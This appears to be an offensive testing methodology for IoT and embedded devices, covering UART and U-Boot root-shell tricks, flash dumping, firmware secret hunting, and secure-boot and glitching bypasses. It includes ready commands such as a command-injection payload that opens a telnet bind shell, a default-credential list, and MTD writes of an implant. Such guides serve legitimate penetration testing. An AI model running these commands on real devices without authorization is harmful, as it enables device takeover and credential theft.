IoT & Embedded — Offensive Testing Methodology
Quick Workflow
- Recon the device physically — identify SoC, flash, debug interfaces, radios
- Get the firmware — vendor download, OTA capture, hardware dump, or chip-off
- Unpack and analyze — filesystems, services, secrets, default creds, vuln components
- Establish runtime access — UART shell, telnet/SSH default creds, exploit chain
- Pivot — to companion app, cloud API, neighboring devices via mesh / wireless
Hardware Reconnaissance
PCB Inspection
- ID the SoC by markings (Realtek, Mediatek, Espressif, Broadcom, Allwinner, NXP, STM32, etc.)
- ID flash (8-pin SOIC = SPI NOR; BGA = eMMC; TSOP = NAND)
- Find debug headers: TX/RX/GND/VCC pads (UART), 4–10 pin (JTAG), 4 pin (SWD)
- Find test points labeled
TX,RX,TCK,TMS,TDO,TDI,RST,BOOT
Tools
| Tool | Use |
|---|---|
| Multimeter | Identify GND, VCC rails before connecting |
| Logic analyzer (Saleae, DSLogic) | Find UART baud, SPI clock, identify protocols |
| USB-UART (FT232, CP2102) | UART console |
| Bus Pirate / Glasgow | UART, SPI, I2C, JTAG generic |
| J-Link / Black Magic Probe | JTAG / SWD MCU debugging |
| CH341A programmer | Cheap SPI flash dumper |
| XGecu T48 | Modern universal programmer (NAND/eMMC/SPI) |
| ChipQuik / hot-air | Chip-off desolder |
UART Discovery
# Find baud rate
for b in 9600 19200 38400 57600 115200 230400 460800 921600; do
echo "=== $b ==="
timeout 5 minicom -b $b -D /dev/ttyUSB0 -C uart_$b.log
done
grep -l -E "U-Boot|Linux|Bootloader|console|login" uart_*.log
Look for: U-Boot console (often Hit any key countdown), Linux init messages, root shell on console, login prompt.
Bootloader Console Drop
# At U-Boot countdown, mash space or key listed
Hit any key to stop autoboot: 0
=> printenv # full env, often includes boot args
=> setenv bootargs ${bootargs} init=/bin/sh
=> boot # Linux comes up to root shell, no login
If U-Boot is locked, try:
CONFIG_DELAY_AUTOBOOT_KEYEDkeyword (vendor-specific)Ctrl+C/Ctrl+B/ specific magic strings- Glitch the U-Boot version-check / signature-check (see Fault Injection)
Flash Dumping
SPI NOR (most common consumer IoT)
# In-circuit dump (hold SoC in reset to avoid bus contention)
flashrom -p ch341a_spi -r firmware.bin
# Verify
file firmware.bin && binwalk firmware.bin
If the SoC fights you: desolder the SPI chip, dump in socket, re-solder.
eMMC / NAND
eMMC is desolder-then-read: BGA-153/169 to SD adapter (cheap eBay), use a USB SD reader.
NAND requires bit-flipping and ECC handling — nanddump/yaffshiv/ubireader post-extraction.
OTA Capture
Many devices fetch firmware over HTTP(S). MITM the device:
# Captive AP + transparent proxy
sudo create_ap wlan0 eth0 IoTLab
mitmproxy --mode transparent --showhost --ssl-insecure
# Or for non-SNI / pinning, use bettercap with custom DNS
Capture the URL, download directly, dissect.
Firmware Analysis
Initial Triage
binwalk -Me firmware.bin # Extract recursively
binwalk -E firmware.bin # Entropy plot — flat = encrypted/compressed
strings firmware.bin | grep -iE "(passwd|key|token|admin|http|ssid)"
Filesystem Mounting
# SquashFS (most consumer Linux IoT)
unsquashfs -d rootfs squashfs.bin
# JFFS2 / UBIFS (NAND-backed)
jefferson jffs2.bin -d rootfs
ubireader_extract_files ubi.bin -o rootfs
Embedded-Linux Quick Wins
# Hardcoded credentials and keys
grep -RIE "(BEGIN (RSA |DSA |EC )?PRIVATE KEY|api[_-]?key|secret|token|passwd|root:[^*])" rootfs/
find rootfs -name "*.pem" -o -name "*.key" -o -name "shadow"
# Telnet/SSH default creds
cat rootfs/etc/passwd rootfs/etc/shadow
grep -r "telnetd" rootfs/etc/init.d
grep -r "dropbear\|sshd" rootfs/
# Setuid binaries
find rootfs -perm -4000 -type f
# Vulnerable busybox / dropbear / openssl versions
rootfs/bin/busybox 2>&1 | head -1
strings rootfs/sbin/dropbear | grep "Dropbear v"
strings rootfs/usr/lib/libssl* | grep "OpenSSL "
# Web admin: lighttpd / mini_httpd / boa / GoAhead — known CVE goldmine
find rootfs -name "lighttpd*" -o -name "boa" -o -name "goahead" -o -name "mini_httpd"
CGI / Web Admin Auditing
GoAhead, Boa, mini_httpd — abandoned codebases, command injection on every other CGI parameter.
# Disassemble a CGI
file rootfs/www/cgi-bin/setup.cgi
# Often plain ELF MIPS/ARM — analyze in Ghidra
ghidra-headlessAnalyzer -import rootfs/www/cgi-bin/setup.cgi
Common patterns:
system()/popen()with concatenated query string argssprintfthensystem— easy command injection- Auth check via comparing cookie to plaintext file (race / replay)
Runtime Exploitation
Console / Telnet Default Creds
Try (per device class): admin/admin, root/root, root/<empty>, admin/password, support/support, cisco/cisco, vendor brand as user/pass. Always try root/<serial number> — many vendors use a per-device default.
Web Admin Command Injection
POST /goform/setSysAdm
Cookie: SESSIONID=...
admin_user=admin&admin_pwd=password;telnetd -l /bin/sh -p 4444;
MTD Writes (re-flash from runtime)
If you have a root shell:
cat /proc/mtd # list partitions
mtd_debug erase /dev/mtd2 0 0x10000
mtd_debug write /dev/mtd2 0 0x10000 implant.bin
/dev/mem
On older kernels without CONFIG_STRICT_DEVMEM, /dev/mem is read/write to physical memory — full system compromise from any root context.
Bootloader / Secure Boot Attacks
U-Boot Quick Bypasses
setenv bootargs ${bootargs} init=/bin/shsetenv preboot 'echo 1 > /sys/...'(run command before kernel)tftpboot— load attacker kernel from networkbootmof a memory-resident image youloadb-uploaded over UART
Secure Boot
Modern devices verify signed bootloaders / kernels. Bypass paths:
- Downgrade: flash an older signed image with known kernel-level CVE
- Rollback bypass: anti-rollback fuses not blown → flash older signed
- Key extraction: dump the OTP / fuse contents via vendor tooling, recover signing key
- Fault injection: glitch the signature-check instruction (see below)
Fault Injection (Voltage / Clock Glitching)
Tools: ChipWhisperer-Lite/Husky, PicoEMP, custom MOSFET crowbar
Target: NAND/eMMC bootrom signature check, U-Boot env-protection check, OTP read
Procedure:
1. Locate target instruction window via UART timing or power trace
2. Apply glitch (V drop / EM pulse) at that offset
3. Sweep delay and width; success = corrupted check, accepted unsigned image
RTOS Targets
| RTOS | Notes |
|---|---|
| FreeRTOS | Single binary, no MMU often → stack overflow → straight RIP control |
| Zephyr | MMU/MPU optional; verify isolation actually enabled |
| ThreadX | Microsoft now, mostly closed |
| MicroEJ / Mbed OS | Java/C mix — type confusion and JNI bridges |
| ESP-IDF (Espressif) | Wi-Fi/BLE stacks, OTA chain, secure boot v2 |
| QNX | Older versions: pdebug shell on serial = root |
MCU Reverse Engineering
# Read protected MCU via SWD / JTAG (if RDP not set)
openocd -f interface/jlink.cfg -f target/stm32f4x.cfg \
-c "init; halt; flash read_bank 0 fw.bin 0 0x100000; exit"
# SAM-BA on Atmel SAM
sam-ba -p \\.\COM3 -d at91sam7s256 -a "read_flash(0,0x40000,fw.bin)"
# Ghidra / Binary Ninja with appropriate processor module (ARM Cortex-M, ESP32 Xtensa, AVR, MSP430)
Wireless Protocols
Bluetooth Low Energy (BLE)
# Discover and enumerate
bettercap -eval "ble.recon on; events.show 60; ble.show"
# GATT introspection
gatttool -b AA:BB:CC:DD:EE:FF -I
> connect
> primary
> char-desc
> char-read-uuid <uuid>
> char-write-req <handle> <hex>
Attack surface: characteristic write without auth, pairing downgrade ("Just Works" forced), session key reuse, app-